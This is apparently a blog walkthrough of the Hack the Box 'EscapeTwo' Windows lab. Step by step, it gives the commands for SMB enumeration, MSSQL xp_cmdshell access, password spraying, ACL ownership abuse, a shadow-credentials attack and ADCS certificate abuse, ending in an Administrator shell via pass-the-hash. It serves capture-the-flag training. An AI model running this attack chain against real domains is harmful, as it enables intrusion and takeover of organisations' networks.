Post

EscapeTwo Easy Machine - Hack the Box

Easy-level Windows machine from Season 7.

Posted Updated
Preview Image
By Mateo Galagorri
5 min read
EscapeTwo Easy Machine - Hack the Box

Information

EscapeTwo Machine is a easy-level Windows machine from Season 7.
As is common in real life Windows pentests, you will start this box with credentials for the following account:
rose / KxEPkKe6R8su

Tools

  • nmap
    • Scan open ports, services, etc
  • smbclient
    • Enum shared folders
    • Access to shared folder
  • crackmapexec
    • Password spray if you have users and passwords lists.
  • impacket
    • (-secretsdump) Attempt to dump NTLM hashes, LSA passwords, etc
    • (-GetUserSPNs) Attempt to get TGS from SPNs accounts.
      • Enum users accounts
      • Obtain hashes to crack
    • (-psexec) Obtain remote shell using SMB. Must have user account with administrative rights.
    • (-owneredit) To change AD object owner. Commonly used if you have an account with “WriteOwner” right and you want to do privilege escalate.
    • (-dacledit) To change AD object ACL. Commonly used in combination with (-owneredit) to give FullControl to user.
    • (-mssqlclient) Establish connection to MSSQL server using Windows or SQL auth. Commonly used to try xp_cmdshell or obtain information in databases.
  • evil-winrm
    • Access through WinRM to target Windows machine and obtain a shell. Must have valid credentials.
  • certipy-ad
    • Interact with AD CS. Commonly used to exploit ADCS and obtain a privileged certificate (i.e Administrator) from vulnerable templates using an account with “certificates request” right.
  • pywhisker & PKINITtools
    • pywhisker manipulate msDs-KeyCredentialLink which is used to store credentials based on public keys and grant the ability to passwordless logins.
    • PKINITtools for request TGT using PFX/PEM files and obtain AS-REP encryption keys (gettgtpkinit) and get NT hashes using that keys (getnthash)

Step by step

  1. Start with Nmap scan for open ports and services: nmap -sV -v 10.10.11.51 We found many open ports, some of them related to Microsoft Windows / Active Directory. One of the open ports is SMB port so we can start our testings from there.
  2. We have a valid user “rose” so we can check which shared folders she can view/access. smbclient -L //10.10.11.51 -U rose --password=KxEPkKe6R8su We found one folder called “Accounting Department”, let’s try access to it. smbclient //10.10.11.51/Accounting\ Department -U rose --password=KxEPkKe6R8su Inside this folder are two .xlsx documents and by its name looks interesting: accounting_2024.xlsx and accounts.xlsx Let’s get them: get accounting_2024.xlsx, get accounts.xlsx
  3. When we try open these files with Microsoft Excel or OpenOffice (i.e) we get a corrupted file error. As information, .xlsx files are just many .xml files compressed into one unique .xlsx file, so we can try to descompress them using 7zip/Winrar (i.e). After descompressed we get many files and looking into them we can see some users and passwords from: One interesting account found is “sa@sequel.htb”. The “sa” account is the default administrator account for Microsoft SQL Server and one of the open ports found with NMAP in our previous step was “1433” and this is the default port for MSSQL.
  4. Let’s try to use our new interesting account on impacket-mssqlclient and see if we can get a cmdshell. impacket-mssqlclient sequel.htb/sa@10.10.11.51 We’re in! From here we can access to databases or try to obtain a shell using xp_cmdshell. Listing the databases is not showing any interesting so let’s try xp_cmdshell. enable_xp_cmdshell xp_cmdshell Searching into Users directory we found a user called “ryan” and the Administrator folder too. Probably “ryan” is our target to obtain the user flag. After more research listing directories and its contents, we found C:\SQL2019\ExpressAdv_Enu\sql-configuration.ini Dumping its content we can see another interesting account: sql_svc.
  5. At this point we have a nice list of users and passwords. Let’s try password spraying to see if some accounts share they passwords. crackmapexec smb 10.10.11.51 -u users.txt -p passwords.txt --continue-on-success Ryan is sharing the same password of “sql_svc” !
  6. Using our newest discovery, let’s try to access through smbclient again. smbclient //10.10.11.51/Users -U ryan --password=WqSZAF6CysDQbGb3 From here we can access ryan home folder and get user.txt flag !

:trophy: USER FLAG PWNED :trophy:

Now for the system (Administrator) flag it’s starting to be a bit tricky.
We can try to use impacket-secretsdump and impacket-psexec or impacket-GetUserSPNs and crack the password using the hashes, but none of those techniques has successfully results.
At this pooint looks like we’re stuck BUT maybe we are just not seeing hidden information of the accounts and objects we already have.
This is where Bloodhound can save your life. With Bloodhound we can view relations, information, vulnerabilities, etc of the AD objects we already have. Making a dump of the information and using it on Bloodhound we found that the user “ryan” has WriteOwner relationship above “ca_svc” account and this can we abused with some techniques.
Looking ca_svc information on Bloodhound we can see it’s member of “cert publishers” group. Maybe using this account we can see if there are certificates misconfigured and by the account name it seems to be some kind of certificates manager/service, but for this we need a password or hash to use “certipy-ad”.
Following the Bloodhound recommendations for Linux Abuse, first of all we need to edit the owner and rights of the “ca_svc” using “ryan”.

  1. impacket-owneredit -action write -new-owner ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3
    impacket-dacledit -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3
    Now we can try any of the Bloodhound abuse recommendations, using kerberoasting doesn’t seem to be a good choice because we’ll need to crack the password with the hash later.
    Doing a “Force Password Change” and then using the account will work but be careful with password changes because this can impact on services or configurations on the operating system and cause errors.
    Finnally, doing a “Shadow credential attack” seems to be the best choice.
  2. After edited the owner and rights we can proceed with:
    pywhisker -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 --target "ca_svc" --action "add"
    This will export “ca_svc” certificates to use later to obtain a TGT.
  3. gettgtpkinit -cert-pem namecaexported_cert.pem -key-pem namecaexported_priv.pem sequel.htb/ca_svc ca_svc.ccache
    Obtained TGT and AS-REP encryption key
    export KRB5CCNAME=ca_svc.ccache
  4. getnthash -key 89094d6d21e9b86e1c0b3b541431ca344171453c6ae71270d4fd7de696a31146 sequel.htb/CA_SVC
    Obtained “ca_svc” NT hash. Now we can use “certipy-ad” with this hash.
  5. certipy-ad find -vulnerable -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.10.11.51 -stdout
    Found vulnerable certificate called “DunderMifflinAuthentication”
  6. Using this template and “ca_svc” we can request the administrator certificate
    certipy-ad req -username 'ca_svc@sequel.htb' -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target DC01.sequel.htb -template DunderMifflinAuthentication -upn administrator@sequel.htb -dc-ip 10.10.11.51
  7. Now we can authenticate with the exported certificate to get the password hash
    certipy-ad auth -pfx administrator.pfx -domain sequel.htb
  8. Finnally we can use this hash to login as administrator
    impacket-psexec sequel.htb/administrator@10.10.11.51 -hashes 7a8d4e04986afa8ed4060f75e5a0b3ff:7a8d4e04986afa8ed4060f75e5a0b3ff
    Now you have shell access as Administrator, only left get the content of the system flag in Administrator home folder.

:trophy: SYSTEM FLAG PWNED :trophy:

Cybersecurity, HackTheBox
htb cybersec pentest guide easy windows
This post is licensed under CC BY 4.0 by the author.